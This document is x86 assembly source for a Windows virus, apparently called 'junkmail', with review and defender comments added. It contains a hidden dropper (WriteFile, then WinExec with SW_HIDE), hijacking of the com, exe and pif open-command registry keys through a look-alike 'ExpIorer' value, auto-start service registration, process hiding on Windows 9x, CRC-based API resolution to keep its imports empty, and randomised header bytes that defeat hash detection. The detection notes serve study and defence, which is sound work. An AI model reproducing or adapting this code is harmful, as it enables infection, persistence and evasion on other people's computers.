; NOTE(review): compact header record. The "mz 03 ... r 04" text on each
; entry looks like a field-layout annotation for the db/dd pair under it,
; but the encoding is not recoverable from this page - confirm against the
; decompressor (outside this page) before relying on it.
; mz 03mz 03mz 03mz 03r 04
db 1, 1, 1, 1
dd 10001110101001100101001111001111b
; mz 07r 04mmz 0ar 0er 0e
db 2, 8, 10h
dd 00010110000111000010100001101100b
; z 05mz 03mz 02mz 03r 08
; 2nd byte: (code end - header start + expsize + 80h), rounded up to a
; multiple of 200h (the file-align value in the header layout below),
; expressed in 100h units
db 10h, ((junkmail_codeend - offset junkmail_inf + expsize + 80h + 1ffh) and not 1ffh) shr 8, 1
dd 00011110000000000000000000000000b
; z 07m
db 0e0h
dd 0
;decompressed data follow. 'X' bytes are set to random value every time
; db 'M', 'Z' ;00
; db "gdi32.dll", 0 ;02 align 4, filler (overload for dll name and import lookup table RVA)
; db 'P', 'E', 0, 0 ;0c 00 signature (overload for date/time stamp)
; dw 14ch ;10 04 machine (overload for forwarder chain)
; dw 1 ;12 06 number of sections (overload for forwarder chain)
; dd 2 ;14 08 date/time stamp (overload for dll name RVA)
; dd 102ch ;18 0c pointer to symbol table (overload for import address table RVA)
; db X, X, X, X ;1c 10 number of symbols
; dw 88h ;20 14 size of optional header
; dw 30fh ;22 16 characteristics
; dw 10bh ;24 18 magic
; db X ;26 1a major linker
; db X ;27 1b minor linker
; dd 0 ;28 1c size of code (overload for import table terminator)
; dd 56h ;2c 20 size of init data (overload for import name table RVA)
; dd 0 ;30 24 size of uninit data (overload for import name table terminator)
; dd offset junkmail_exe - offset junkmail_inf + expsize + 1000h
; ;34 28 entry point
; db X, X, X, X ;38 2c base of code
; dd 0ch ;3c 30 base of data (overload for lfanew)
; dd 400000h ;40 34 image base
; dd 1000h ;44 38 section align
; dd 200h ;48 3c file align
; db 1, X ;4c 40 major os
; db X, X ;4e 42 minor os
; db X, X ;50 44 major image
; db X, X ;52 46 minor image
; dw 4 ;54 48 major subsys
; dw 0 ;56 4a minor subsys (overload for import name table)
; db "Arc", 0 ;58 4c reserved (overload for import name table)
; dd (aligned size of code) ;5c 50 size of image
; dd expsize ;60 54 size of headers
; dd 0 ;64 58 checksum
; dw 2 ;68 5c subsystem
; db X, X ;6a 5e dll characteristics
; dd 1 ;6c 60 size of stack reserve
; dd 1 ;70 64 size of stack commit
; dd 1 ;74 68 size of heap reserve
; dd 1 ;78 6c size of heap commit
; db X, X, X, X ;7c 70 loader flags
; dd 2 ;80 74 number of rva and sizes (ignored by Windows 9x/Me)
; dd 0 ;84 78 export
; db X, X, X, X ;88 7c export
; dd 1008h ;8c 80 import
; dd 0 ;90 84 import
; dd 0 ;94 88 resource
; db X, X, X, X ;98 8c resource
; db X, X, X, X, X, X, X, X ;9c 90 exception
; db X, X, X, X, X, X, X, X ;a4 98 certificate
; db X, X, X, X, X, X, X, X ;ac a0 base reloc (overload for section name)
; dd 0 ;b4 a8 debug (overload for virtual size)
; dd 1000h ;b8 ac debug (overload for virtual address)
; dd (aligned size of code) ;bc b0 architecture (overload for file size)
; dd 1 ;c0 b4 architecture (overload for file offset)
; db X, X, X, X ;c4 b8 global data (overload for pointer to relocs)
; db X, X, X, X ;c8 bc global data (overload for pointer to line numbers)
; dd 0 ;cc c0 tls (overload for reloc table and line numbers)
; dd 0e0000000h ;d0 c4 tls (overload for section characteristics)
; ;d4
;-----------------------------------------------------------------------------
; copy_exp: finish writing the dropped file, then launch it.
; In:  esi = source, rebased below so that it ends at mail_recip
;      edi = output buffer position
;      ebp = file handle (passed to WriteFile and CloseHandle)
;      [esp] = expcrcstk frame of resolved API pointers (popped into ebx)
; NOTE(review): `mov cx` leaves ecx[31:16] untouched, while `rep movs` counts
; with the full ecx, so this relies on the upper half already being zero.
; Defender note: WriteFile -> CloseHandle -> WinExec(<dropped path>, SW_HIDE)
; is the dropper sequence to look for in behavioural traces.
;-----------------------------------------------------------------------------
copy_exp label near
mov cx, offset mail_recip - offset junkmail_inf
sub esi, offset copy_exp - offset junkmail_inf
rep movs byte ptr [edi], byte ptr [esi] ;esi == mail_recip (rebased) afterwards
mov al, "'"
stos byte ptr [edi] ;append closing quote
pop ebx
push ebp ;hFile; the remaining WriteFile args are presumably already on the stack - TODO confirm in the caller
call dword ptr [ebx + expcrcstk.pWriteFile]
push ebp
call dword ptr [ebx + expcrcstk.pCloseHandle]
pop eax ;top of stack, presumably the dropped file's path - TODO confirm
push eax
inc ebp ;ebp == -1 (INVALID_HANDLE_VALUE) means the drop failed, presumably because the file already exists
je load_regdll ;allow only 1 copy to run
push 0 ;nCmdShow = SW_HIDE
push eax ;lpCmdLine
call dword ptr [ebx + expcrcstk.pWinExec]
;-----------------------------------------------------------------------------
; load_regdll: LoadLibraryA(regdll) and resolve the registry/service APIs.
; The `call init_findmz` is immediately followed by the CRC table, so its
; return address doubles as the table pointer - presumably how init_findmz
; (outside this page) locates it; TODO confirm.
;-----------------------------------------------------------------------------
load_regdll label near
sub esi, offset mail_recip - offset regdll ;esi -> regdll (dll name string, defined outside this page)
push esi
call dword ptr [ebx + expcrcstk.pLoadLibraryA]
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
regcrcbegin label near ;place < 80h bytes from call for smaller code
dd (regcrc_count + 1) dup (0) ;regcrc_count slots + terminator, presumably filled by init_findmz
regcrcend label near
dd offset reg_file - offset regcrcend + 4 ;distance from this dword to reg_file - presumably where execution resumes after the table
regval db 'ExpIorer "%1" %*', 0
; NOTE(review): "ExpIorer" is spelled with a capital I, not a lowercase l -
; a look-alike of "Explorer" that reads as the real thing in a registry
; editor.  The exact byte string is a stable detection signature for the
; hijacked ...\shell\open\command values written in reg_file, and the "%1"
; is why the program the user launched still runs (see get_cmdline).
regkey db "\com" ;no regedit.com ;)
db "\exe" ;must be 4 bytes long
db "\pif" ;hook all executable suffix (except .scr which passes /S)
mov ebx, esp
mov ecx, HKEY_LOCAL_MACHINE ;can obfuscate and same size if push 5+pop ecx+ror ecx, 1
;-----------------------------------------------------------------------------
;alter Software\Classes in Local Machine and Current User
;because in Windows 2000/XP, Current User values override Local Machine values
;-----------------------------------------------------------------------------
reg_loopouter label near
lea ebp, dword ptr [edi + offset regval - offset reg_file]
sub edi, offset reg_file - offset regkey
push (offset reg_file - offset regkey) shr 2
pop esi
reg_loopinner label near
push ecx
push "dna"
push "mmoc"
push "\nep"
push "o\ll"
push "ehs\"
push "elif"
push dword ptr [edi] ;comfile, exefile, piffile
push "sess"
push "alc\"
push "eraw"
push "tfos" ;obfuscated ;)
mov eax, esp
push offset regkey - offset regval
push ebp
push REG_SZ
push eax
push ecx
call dword ptr [ebx + regcrcstk.rRegSetValueA]
;RegSetValue creates keys
add esp, 2ch ;size software\classes\???file\shell\open\command
scas dword ptr [edi]
pop ecx
dec esi
jne reg_loopinner
loopw reg_loopouter ;decrements CX only
;-----------------------------------------------------------------------------
;register as service if NT/2000/XP (recognised but ignored by 9x/Me)
;no start service because code is running already
;-----------------------------------------------------------------------------
push SC_MANAGER_CREATE_SERVICE
push esi
push esi
call dword ptr [ebx + regcrcstk.rOpenSCManagerA]
mov ecx, dword ptr [ebx + size regcrcstk]
push ecx
push eax
push esi
push esi
push esi
push esi
push esi
push ecx
push esi ;SERVICE_ERROR_IGNORE
push SERVICE_AUTO_START
push SERVICE_WIN32_OWN_PROCESS
push esi
sub edi, offset reg_file - offset dispname
push edi
add edi, offset explabel - offset dispname
push edi
push eax
call dword ptr [ebx + regcrcstk.rCreateServiceA]
push eax
call dword ptr [ebx + regcrcstk.rCloseServiceHandle]
call dword ptr [ebx + regcrcstk.rCloseServiceHandle]
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pGlobalFree]
popad
host_patch label near
db 0e9h, 'rgb!'
;-----------------------------------------------------------------------------
;virus code begins here in dropped exe
;-----------------------------------------------------------------------------
; Entry point of the dropped file (the header layout above places the entry
; point at junkmail_exe). walk_seh and init_findmz are outside this page.
; Defender note: APIs are resolved at runtime from the CRC tables rather than
; imported, so the dropped file's import table shows none of them - detection
; has to rely on behaviour or on string signatures such as regval.
junkmail_exe label near
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
execrcbegin label near ;place < 80h bytes from call for smaller code
dd (execrc_count + 1) dup (0) ;execrc_count slots + terminator, presumably filled by init_findmz
execrcend label near
dd offset load_user32 - offset execrcend + 4 ;distance from this dword to load_user32
load_user32 label near
call skip_user32 ;pushes the address of the "user32" string below as its return address
db "user32", 0
skip_user32 label near
call dword ptr [esp + execrcstk.eLoadLibraryA + 4] ;LoadLibraryA("user32"); +4 skips the pushed string pointer
call init_findmz ;return address -> the usrcrc table that follows
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
; user32 table; the W/A pairs are selected via esi in get_cmdline
usrcrcbegin label near ;place < 80h bytes from call for smaller code
dd (usrcrc_count + 1) dup (0) ;usrcrc_count slots + terminator, presumably filled by init_findmz
usrcrcend label near
dd offset get_cmdline - offset usrcrcend + 4 ;distance from this dword to get_cmdline
;-----------------------------------------------------------------------------
;determine platform and dynamically select function types (ANSI or Unicode)
;-----------------------------------------------------------------------------
; get_cmdline: pick ANSI/Unicode API variants, then look for argv[1]. If it
; exists, this file was started through the hijacked ...\shell\open\command
; ("%1" in regval): launch argv[1] and exit so the user sees the program
; they asked for. Otherwise fall through to stack_copy.
; Register roles: ebx = usrcrcstk frame (esp)
;                 esi = ebx, or ebx + 4 on 9x/Me (the A variant is presumably
;                       the slot after each W entry - TODO confirm usrcrcstk)
;                 edi = per-character mask: ffffh (UTF-16) or 00ffh (ANSI)
;-----------------------------------------------------------------------------
get_cmdline label near
mov ebx, esp
call dword ptr [ebx + size usrcrcstk + execrcstk.eGetVersion]
shr eax, 1fh ;eax = top bit of GetVersion(): 1 on 9x/Me (per the comments below), 0 on NT
lea esi, dword ptr [eax * 4 + ebx]
;-----------------------------------------------------------------------------
;RegisterServiceProcess() if 9x/Me (just sets one bit)
;-----------------------------------------------------------------------------
mov ecx, dword ptr fs:[tib.TibTeb]
or byte ptr [ecx + teb.procflags + 1], al ;al == 0 on NT, so this is a no-op there
;-----------------------------------------------------------------------------
;parse command-line in platform-independent way to see how file was run
;-----------------------------------------------------------------------------
dec ax ;0 -> ffffh (NT), 1 -> 0 (9x/Me)
mov al, 0ffh
xchg edi, eax ;ffff if Unicode, 00ff if ANSI
mov eax, dword ptr [esi + usrcrcstk.uCharNextW]
; NOTE(review): self-patching - stores the CharNext pointer into a code
; location of the dropped image at a hard-coded address (400000h image base
; + 1001h + offset). This needs a writable code section, which the header
; layout above provides (section characteristics 0e0000000h = code | exec |
; read | write). A fixed image base plus a writable code section is a useful
; static indicator for the dropped file.
mov dword ptr ds:[offset store_charnext - offset junkmail_inf + expsize + 401001h], eax
call dword ptr [esi + size usrcrcstk + execrcstk.eGetCommandLineW]
stack_delta label near
; delimiter for argv[0] is '"' if it is quoted, else ' '.
; each `mov reg, [eax]` / `and reg, edi` pair reads one ANSI or UTF-16 unit;
; the load is 4 bytes wide, so it may read up to 3 bytes past the
; terminating NUL.
mov ebp, dword ptr [eax]
and ebp, edi
cmp ebp, '"' ;Unicode-compatible compare
je skip_argv0
push ' '
pop ebp
skip_argv0 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW] ;eax = next char (A or W variant per esi)
mov ecx, dword ptr [eax]
and ecx, edi
je argv1_skip ;NUL before the delimiter: no argv[1] (ecx == 0)
cmp ecx, ebp
jne skip_argv0
find_argv1 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW]
mov ecx, dword ptr [eax]
and ecx, edi
cmp ecx, ' ' ;Unicode-compatible compare
je find_argv1 ;skip the blanks between argv[0] and argv[1]
argv1_skip label near
;-----------------------------------------------------------------------------
;if argv1 exists then argv0 was run using shell\open\command so run argv1
;-----------------------------------------------------------------------------
jecxz stack_copy ;ecx == 0 when the first non-blank char is NUL: no argv[1]
sub esp, size processinfo
mov edx, esp ;edx -> PROCESS_INFORMATION
sub esp, size startupinfo
mov ecx, esp ;ecx -> STARTUPINFO
push edx ;lpProcessInformation
push ecx ;lpStartupInfo
xor edx, edx
push edx ;lpCurrentDirectory = NULL
push edx ;lpEnvironment = NULL
push edx ;dwCreationFlags = 0
push edx ;bInheritHandles = FALSE
push edx ;lpThreadAttributes = NULL
push edx ;lpProcessAttributes = NULL
push eax ;lpCommandLine -> argv[1] onwards
push edx ;lpApplicationName = NULL
push ecx ;GetStartupInfo(lpStartupInfo)
call dword ptr [esi + size usrcrcstk + execrcstk.eGetStartupInfoW]
call dword ptr [esi + size usrcrcstk + execrcstk.eCreateProcessW]
call dword ptr [ebx + size usrcrcstk + execrcstk.eExitProcess] ;exit code = whatever is on top of the stack; CreateProcess result not checked
;-----------------------------------------------------------------------------
;allocate stack space for RNG cache
;-----------------------------------------------------------------------------
; stack_copy: seed the RNG from GetTickCount(), build the RNG state on the
; stack, then hand an address inside kernel32 to find_mzhdr.
; NOTE(review): `size usrcrcstk.execrcstk.eGetTickCount` differs from the
; `size usrcrcstk + execrcstk.X` form used everywhere else on this page -
; check the original source before trusting this line.
; Defender note: the header layout above says the 'X' header bytes of each
; dropped copy are randomised, presumably from this RNG, so whole-file hashes
; of dropped copies are not a stable indicator; prefer string or behaviour
; signatures.
stack_copy label near
mov ebx, dword ptr [ebx + size usrcrcstk.execrcstk.eGetTickCount] ;ebx = address of GetTickCount
call ebx ;RNG seed
enter (statelen + 1) shl 2, 0 ;RNG cache
mov edi, esp ;edi -> RNG state buffer
call randinit ;randinit and find_mzhdr are outside this page
mov edi, ebx ;an address inside kernel32 - presumably find_mzhdr's search start
call find_mzhdr
krncrcbegin label near ;place < 80h bytes from call for smaller code